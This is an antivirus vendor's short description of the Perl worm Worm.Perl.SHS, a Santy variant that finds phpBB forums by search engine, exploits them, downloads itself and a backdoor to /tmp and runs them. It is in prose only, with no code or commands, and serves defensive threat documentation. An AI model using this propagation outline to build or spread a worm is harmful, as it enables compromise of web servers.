Home / malwarePDF  

Worm.Perl.SHS.{A-B}


First posted on 21 November 2011.
Source: BitDefender

Aliases :

Worm.Perl.SHS.{A-B} is also known as Net-Worm.Perl.Santy.d, (KAV.

Explanation :

The virus is a Perl script, supposedly developed from the Worm.PhpBB.Santy.A source code.

It uses a vulnerability in the PHPBB forum code to propagate itself. The list of sites is obtained from Google search and Yahoo Cade search (version A) or Yahoo Cade and AOL Search (version B).

After finding a suitable target, the virus then exploits the PHPBB code and if the PHPBB code is vulnerable, the exploit will perform several commands:

- kills all perl and wget processes.
- downloads the worm and a perl scripted backdoor (Backdoor.Perl.Shellcode.B) to the /tmp directory
- starts the worm and the backdoor
- deletes all ssh.* and bot* files in the tmp directory

Last update 21 November 2011

 

TOP